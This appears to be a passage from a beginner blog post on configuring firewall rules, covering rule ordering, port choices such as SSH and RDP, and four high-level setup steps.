Applying rules in a firewall is often very easy. You can see that the commands aren’t very long and UIs can make even complex rules creatable in a minute. However, defining and configuring your firewall rules correctly is very complicated. It is important that the rules are applied in the right order (“deny all traffic” needs to be the last rule applied, after the few approvals that you add for traffic you want, for instance). It is also important that your rules fit your business and your needs. Certain companies might need to allow traffic over port 22 (ssh). Some of those companies might allow free connections to the port, while others might “IP Whitelist” and only allow certain locations to connect. Other companies might allow the default RDP port of 3389, while other companies that have no Windows Servers would never need that port opened. The team defining these setups must understand the entire organization’s needs in order to lock the network down correctly. It is a razor’s edge: too strict and the company could not function effectively, too permissive and the company could be vulnerable to intrusion by threat actors. But here are the 30,000ft view of the steps that the team would undertake to configure a firewall.

  1. Identifying Network Requirements: Understanding what services and traffic are necessary for your network.
  2. Defining Clear Security Policies: Knowing what your organization’s security policies are in terms of what should be allowed or blocked.
  3. Implementing and Testing Rules: Gradually implementing rules and testing them to ensure they donโ€™t disrupt legitimate traffic.
  4. Regular Updates and Monitoring: Keeping the firewall rules updated according to the evolving network needs and security landscape.

Whew, that’s a lot. If you’re new to this entire idea and reading this from a beginner’s point of view, I hope that I didn’t make this super confusing. I am hoping that by seeing these scenarios and beginning to “think in firewall logic” that you’ll begin to understand more fully the roles that firewalls play and how someone would begin to think about setting them up. It definitely has more in common with “who can come into my clubhouse?” than stupid scenes in movies where say ridiculous statements like “our firewall is at 19%”.